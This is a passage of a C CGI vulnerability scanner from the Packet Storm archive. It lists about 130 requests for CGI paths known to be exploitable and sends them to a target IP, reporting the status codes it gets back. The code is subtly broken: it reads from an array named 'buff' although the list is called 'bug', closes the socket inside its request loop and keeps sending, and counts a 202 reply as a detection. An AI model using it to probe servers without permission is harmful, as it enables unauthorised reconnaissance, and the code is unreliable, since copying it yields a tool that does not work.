bug[242] = "GET /cgi-bin/technote/main.cgi HTTP/1.0\n\n";
bug[243] = "GET /cgi-bin/test-cgi HTTP/1.0\n\n";
bug[244] = "GET /cgi-bin/test.cgi HTTP/1.0\n\n";
bug[245] = "GET /cgi-bin/test/test.cgi HTTP/1.0\n\n";
bug[246] = "GET /cgi-bin/test2.pl HTTP/1.0\n\n";
bug[247] = "GET /cgi-bin/testing_whatever HTTP/1.0\n\n";
bug[248] = "GET /cgi-bin/tidfinder.cgi HTTP/1.0\n\n";
bug[249] = "GET /cgi-bin/tigvote.cgi HTTP/1.0\n\n";
bug[250] = "GET /cgi-bin/title.cgi HTTP/1.0\n\n";
bug[251] = "GET /cgi-bin/traffic.cgi HTTP/1.0\n\n";
bug[252] = "GET /cgi-bin/troops.cgi HTTP/1.0\n\n";
bug[253] = "GET /cgi-bin/ttawebtop.cgi/ HTTP/1.0\n\n";
bug[254] = "GET /cgi-bin/ultraboard.cgi HTTP/1.0\n\n";
bug[255] = "GET /cgi-bin/upload.cgi HTTP/1.0\n\n";
bug[256] = "GET /cgi-bin/urlcount.cgi HTTP/1.0\n\n";
bug[257] = "GET /cgi-bin/viewcvs.cgi HTTP/1.0\n\n";
bug[258] = "GET /cgi-bin/viralator.cgi HTTP/1.0\n\n";
bug[259] = "GET /cgi-bin/virgil.cgi HTTP/1.0\n\n";
bug[260] = "GET /cgi-bin/vote.cgi HTTP/1.0\n\n";
bug[261] = "GET /cgi-bin/vpasswd.cgi HTTP/1.0\n\n";
bug[262] = "GET /cgi-bin/way-board.cgi HTTP/1.0\n\n";
bug[263] = "GET /cgi-bin/way-board/way-board.cgi HTTP/1.0\n\n";
bug[264] = "GET /cgi-bin/webbbs.cgi HTTP/1.0\n\n";
bug[265] = "GET /cgi-bin/webcart/webcart.cgi HTTP/1.0\n\n";
bug[266] = "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n";
bug[267] = "GET /cgi-bin/webif.cgi HTTP/1.0\n\n";
bug[268] = "GET /cgi-bin/webmail/html/emumail.cgi HTTP/1.0\n\n";
bug[269] = "GET /cgi-bin/webmap.cgi HTTP/1.0\n\n";
bug[270] = "GET /cgi-bin/webspirs.cgi HTTP/1.0\n\n";
bug[271] = "GET /cgi-bin/whois.cgi HTTP/1.0\n\n";
bug[272] = "GET /cgi-bin/whois/whois.cgi HTTP/1.0\n\n";
bug[273] = "GET /cgi-bin/whois_raw.cgi HTTP/1.0\n\n";
bug[274] = "GET /cgi-bin/wrap HTTP/1.0\n\n";
bug[275] = "GET /cgi-bin/wrap.cgi HTTP/1.0\n\n";
bug[276] = "GET /cgi-bin/wwwboard.cgi.cgi HTTP/1.0\n\n";
bug[277] = "GET /cgi-bin/YaBB/YaBB.cgi HTTP/1.0\n\n";
bug[278] = "GET /cgi-bin/zml.cgi HTTP/1.0\n\n";
bug[279] = "GET /cgi-sys/addalink.cgi HTTP/1.0\n\n";
bug[280] = "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0\n\n";
bug[281] = "GET /cgi-sys/domainredirect.cgi HTTP/1.0\n\n";
bug[282] = "GET /cgi-sys/entropybanner.cgi HTTP/1.0\n\n";
bug[283] = "GET /cgi-sys/entropysearch.cgi HTTP/1.0\n\n";
bug[284] = "GET /cgi-sys/FormMail-clone.cgi HTTP/1.0\n\n";
bug[285] = "GET /cgi-sys/helpdesk.cgi HTTP/1.0\n\n";
bug[286] = "GET /cgi-sys/mchat.cgi HTTP/1.0\n\n";
bug[287] = "GET /cgi-sys/randhtml.cgi HTTP/1.0\n\n";
bug[288] = "GET /cgi-sys/realhelpdesk.cgi HTTP/1.0\n\n";
bug[289] = "GET /cgi-sys/realsignup.cgi HTTP/1.0\n\n";
bug[290] = "GET /cgi-sys/signup.cgi HTTP/1.0\n\n";
bug[291] = "GET /cgis/wwwboard/wwwboard.cgi HTTP/1.0\n\n";
bug[292] = "GET /connector.cgi HTTP/1.0\n\n";
bug[293] = "GET /cp/rac/nsManager.cgi HTTP/1.0\n\n";
bug[294] = "GET /create_release.sh HTTP/1.0\n\n";
bug[295] = "GET /CSNews.cgi HTTP/1.0\n\n";
bug[296] = "GET /csPassword.cgi HTTP/1.0\n\n";
bug[297] = "GET /dcadmin.cgi HTTP/1.0\n\n";
bug[298] = "GET /dcboard.cgi HTTP/1.0\n\n";
bug[299] = "GET /dcforum.cgi HTTP/1.0\n\n";
bug[300] = "GET /dcforum/dcforum.cgi HTTP/1.0\n\n";
bug[301] = "GET /debug.cgi HTTP/1.0\n\n";
bug[302] = "GET /details.cgi HTTP/1.0\n\n";
bug[303] = "GET /edittag/edittag.cgi HTTP/1.0\n\n";
bug[304] = "GET /emumail.cgi HTTP/1.0\n\n";
bug[305] = "GET /enter_bug.cgi HTTP/1.0\n\n";
bug[306] = "GET /ez2000/ezadmin.cgi HTTP/1.0\n\n";
bug[307] = "GET /ez2000/ezboard.cgi HTTP/1.0\n\n";
bug[308] = "GET /ez2000/ezman.cgi HTTP/1.0\n\n";
bug[309] = "GET /fcgi-bin/echo HTTP/1.0\n\n";
bug[310] = "GET /fcgi-bin/echo2 HTTP/1.0\n\n";
bug[311] = "GET /Gozila.cgi HTTP/1.0\n\n";
bug[312] = "GET /hitmatic/analyse.cgi HTTP/1.0\n\n";
bug[313] = "GET /html/cgi-bin/cgicso HTTP/1.0\n\n";
bug[314] = "GET /index.cgi HTTP/1.0\n\n";
bug[315] = "GET /info.cgi HTTP/1.0\n\n";
bug[316] = "GET /infosrch.cgi HTTP/1.0\n\n";
bug[317] = "GET /login.cgi HTTP/1.0\n\n";
bug[318] = "GET /mailview.cgi HTTP/1.0\n\n";
bug[319] = "GET /main.cgi HTTP/1.0\n\n";
bug[320] = "GET /megabook/admin.cgi HTTP/1.0\n\n";
bug[321] = "GET /ministats/admin.cgi HTTP/1.0\n\n";
bug[322] = "GET /mods/apage/apage.cgi HTTP/1.0\n\n";
bug[323] = "GET /musicqueue.cgi HTTP/1.0\n\n";
bug[324] = "GET /ncbook.cgi HTTP/1.0\n\n";
bug[325] = "GET /newpro.cgi HTTP/1.0\n\n";
bug[326] = "GET /newsletter.sh HTTP/1.0\n\n";
bug[327] = "GET /oem_webstage/cgi-bin/oemapp_cgi HTTP/1.0\n\n";
bug[328] = "GET /page.cgi HTTP/1.0\n\n";
bug[329] = "GET /parse_xml.cgi HTTP/1.0\n\n";
bug[330] = "GET /photo/manage.cgi HTTP/1.0\n\n";
bug[331] = "GET /photodata/manage.cgi HTTP/1.0\n\n";
bug[332] = "GET /print.cgi HTTP/1.0\n\n";
bug[333] = "GET /process_bug.cgi HTTP/1.0\n\n";
bug[334] = "GET /pub/english.cgi HTTP/1.0\n\n";
bug[335] = "GET /quikmail/nph-emumail.cgi HTTP/1.0\n\n";
bug[336] = "GET /quikstore.cgi HTTP/1.0\n\n";
bug[337] = "GET /reviews/newpro.cgi HTTP/1.0\n\n";
bug[338] = "GET /ROADS/cgi-bin/search.pl HTTP/1.0\n\n";
bug[339] = "GET /sample01.cgi HTTP/1.0\n\n";
bug[340] = "GET /sample02.cgi HTTP/1.0\n\n";
bug[341] = "GET /sample03.cgi HTTP/1.0\n\n";
bug[342] = "GET /sample04.cgi HTTP/1.0\n\n";
bug[343] = "GET /sampleposteddata.cgi HTTP/1.0\n\n";
bug[344] = "GET /scancfg.cgi HTTP/1.0\n\n";
bug[345] = "GET /servers/link.cgi HTTP/1.0\n\n";
bug[346] = "GET /setpasswd.cgi HTTP/1.0\n\n";
bug[347] = "GET /SetSecurity.shm HTTP/1.0\n\n";
bug[348] = "GET /shop/member_html.cgi HTTP/1.0\n\n";
bug[349] = "GET /shop/normal_html.cgi HTTP/1.0\n\n";
bug[350] = "GET /site_searcher.cgi HTTP/1.0\n\n";
bug[351] = "GET /siteUserMod.cgi HTTP/1.0\n\n";
bug[352] = "GET /submit.cgi HTTP/1.0\n\n";
bug[353] = "GET /technote/print.cgi HTTP/1.0\n\n";
bug[354] = "GET /template.cgi HTTP/1.0\n\n";
bug[355] = "GET /test.cgi HTTP/1.0\n\n";
bug[356] = "GET /upload.cgi HTTP/1.0\n\n";
bug[357] = "GET /userreg.cgi HTTP/1.0\n\n";
bug[358] = "GET /users/scripts/submit.cgi HTTP/1.0\n\n";
bug[359] = "GET /Web_Store/web_store.cgi HTTP/1.0\n\n";
bug[360] = "GET /webtools/bonsai/ccvsblame.cgi HTTP/1.0\n\n";
bug[361] = "GET /webtools/bonsai/cvsblame.cgi HTTP/1.0\n\n";
bug[362] = "GET /webtools/bonsai/cvslog.cgi HTTP/1.0\n\n";
bug[363] = "GET /webtools/bonsai/cvsquery.cgi HTTP/1.0\n\n";
bug[364] = "GET /webtools/bonsai/cvsqueryform.cgi HTTP/1.0\n\n";
bug[365] = "GET /webtools/bonsai/showcheckins.cgi HTTP/1.0\n\n";
bug[366] = "GET /wwwadmin.cgi HTTP/1.0\n\n";
bug[367] = "GET /wwwboard.cgi HTTP/1.0\n\n";
bug[368] = "GET /cgi-sys/entropysearch.cgi HTTP/1.0\n\n";
bug[369] = "GET /cgi-sys/FormMail-clone.cgi HTTP/1.0\n\n";
bug[370] = "GET /wwwboard/wwwsboard.cgi HTTP/1.0\n\n";


int errex;
int numbytes = 0 , opt;
sock = socket(AF_INET,SOCK_STREAM,0);
remote.sin_port = htons(PORT);
remote.sin_addr.s_addr = inet_addr(IP);
remote.sin_family = AF_INET;
memset(remote.sin_zero,0,sizeof(remote.sin_zero));
fflush(stdout);
if (sock == -1) {
perror("socket creation error");
return;
}
FD_ZERO( &wset );
FD_SET( sock , &wset );
FD_ZERO( &rset );
FD_SET( sock , &rset );

tv.tv_sec = TIMEOUT;
tv.tv_usec = 0;
if( fcntl( sock , F_SETFL , O_NONBLOCK ) == -1 ) {
perror("fcntl error");
return;
}
errex = connect(sock,(struct sockaddr *)&remote,sizeof(struct sockaddr));
if( errno != EINPROGRESS && errno != EISCONN ) {
perror("connection error");
return;
}
opt = select(sock+1,NULL,&wset,NULL,&tv);
if( fcntl( sock , F_SETFL , 0 ) == -1 ) {
perror("fcntl error");
return;
}

if( opt == -1 ) {
perror("select error");
return;
}
if( !opt ) {
printf("time out.\n");
return;
}

numbytes = recv(sock,server,sizeof(server),0);
if( numbytes == -1 ) {
perror("recv");
return;
}

server[numbytes-1]='\0';
if(strlen(server) == 0) {
printf("connection closed\n");
return;
}

while(i<370) {
i++;
printf("\n\n\n %d-th session, Loading... \n", i);
char request_msg[512];
snprintf(request_msg, sizeof(request_msg), buff[i], useragent);
printf("requested message is below \n %s\n", request_msg);
send(sock, request_msg, strlen(request_msg), 0);

char buffers[1500];

// fcntl( sock , F_SETFL , 0 );

int cnt = recv(sock, buffers, sizeof(buffers), 0);
buffers[cnt-1]='\0';

if(strlen(server) == 0) {
printf("[E] Software Error.\n");
printf("[R] Closing connections.\n");
return;
}
printf("First part of response message is below: \n %s\n",buffers);
if ( strstr(buffers, "404")) printf("RFC 2616, 10.4.5 - HTTP Error [404] False Positive. The server has not found anything matching the Request-URI. No indication is given of whether the condition is temporary or permanent. The 410 Gone status code SHOULD be used if the server knows, through some internally configurable mechanism, that an old resource is permanently unavailable and has no forwarding address. This status code is commonly used when the server does not wish to reveal exactly why the request has been refused, or when no other response is applicable.\n\a");
if ( strstr(buffers, "202")) printf("RFC 2616, 10.2.3 - HTTP Okay [202] Detected Common Gateway Interface Script: %s .\n\a", bug[i]);
if ( strstr(buffers, "401")) printf("RFC 2616, 10.4.2 - HTTP Unauthorized [401] Unauthorized Access: The request requires user authentication. The response MUST include a WWW-Authenticate header field - section 14.47 containing a challenge applicable to the requested resource. The client MAY repeat the request with a suitable Authorization header field section 14.8. If the request already included Authorization credentials, then the 401 response indicates that authorization has been refused for those credentials. If the 401 response contains the same challenge as the prior response, and the user agent has already attempted authentication at least once, then the user SHOULD be presented the entity that was given in the response, since that entity might include relevant diagnostic information. HTTP access authentication is explained in HTTP Authentication: Basic and Digest Access Authentication.\n\a");
if ( strstr(buffers, "500")) printf("RFC 2616, 10.5.1 - HTTP Internal Server Error [500] Internal Server Error - Couldn't recognise the request or server error occured. The server encountered an unexpected condition which prevented it from fulfilling the request.\n\a");
if ( strstr(buffers, "303")) printf("RFC 2616, 10.3.4 - HTTP See Other [303] Possible Redirect - The requested resource is temporary under a different URL: The response to the request can be found under a different URI and SHOULD be retrieved using a GET method on that resource. This method exists primarily to allow the output of a POST-activated script to redirect the user agent to a selected resource. The new URI is not a substitute reference for the originally requested resource. The 303 response MUST NOT be cached, but the response to the second *redirected* request might be cacheable.\n\a");
if ( strstr(buffers, "307")) printf("RFC 2616, 10.3.8 - HTTP Temporary Redirect [307] Possible Redirect - The requested resource resides temporarily under a different URI. Since the redirection MAY be altered on occasion, the client SHOULD continue to use the Request-URI for future requests. This response is only cacheable if indicated by a Cache-Control or Expires header field. The temporary URI SHOULD be given by the Location field in the response. Unless the request method was HEAD, the entity of the response SHOULD contain a short hypertext note with a hyperlink to the new URIs , since many pre-HTTP/1.1 user agents do not understand the 307 status. Therefore, the note SHOULD contain the information necessary for a user to repeat the original request on the new URI.\n\a");
if ( strstr(buffers, "403")) printf("RFC 2616, 10.4.4 - HTTP Forbidden [403] The server understood the request, but is refusing to fulfill it. Authorization will not help and the request SHOULD NOT be repeated. If the request method was not HEAD and the server wishes to make public why the request has not been fulfilled, it SHOULD describe the reason for the refusal in the entity. If the server does not wish to make this information available to the client, the status code 404 - Not Found can be used instead.\n\a");
if ( strstr(buffers, "407")) printf("RFC 2616, 10.4.8 - HTTP Proxy Authentication Required [407] - This code is similar to 401 Unauthorized, but indicates that the client must first authenticate itself with the proxy. The proxy MUST return a Proxy-Authenticate header field section 14.33 containing a challenge applicable to the proxy for the requested resource. The client MAY repeat the request with a suitable Proxy-Authorization header field.\n\a");
if ( strstr(buffers, "408")) printf("RFC 2616, 10.4.9 - HTTP Request Time out [408] - The client did not produce a request within the time that the server was prepared to wait. The client MAY repeat the request without modifications at any later time.\n\a");
if ( strstr(buffers, "503")) printf("RFC 2616, 10.5.4 - HTTP Service Unavailable [503] - Server Side Refuse. The server is currently unable to handle the request due to a temporary overloading or maintenance of the server. The implication is that this is a temporary condition which will be alleviated after some delay. If known, the length of the delay MAY be indicated in a Retry-After header. If no Retry-After is given, the client SHOULD handle the response as it would for a 500 response.\n\a");
close(sock);
}

fprintf(stdout, "Scan for IP -> %s has now been completed. \n\a", inet_ntoa(remote.sin_addr));

exit(1);
}
Login or Register to add favorites

File Archive:

March 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    19 Files
  • 2
    Mar 2nd
    15 Files
  • 3
    Mar 3rd
    30 Files
  • 4
    Mar 4th
    13 Files
  • 5
    Mar 5th
    9 Files
  • 6
    Mar 6th
    0 Files
  • 7
    Mar 7th
    0 Files
  • 8
    Mar 8th
    0 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    0 Files
  • 12
    Mar 12th
    0 Files
  • 13
    Mar 13th
    0 Files
  • 14
    Mar 14th
    0 Files
  • 15
    Mar 15th
    0 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    0 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close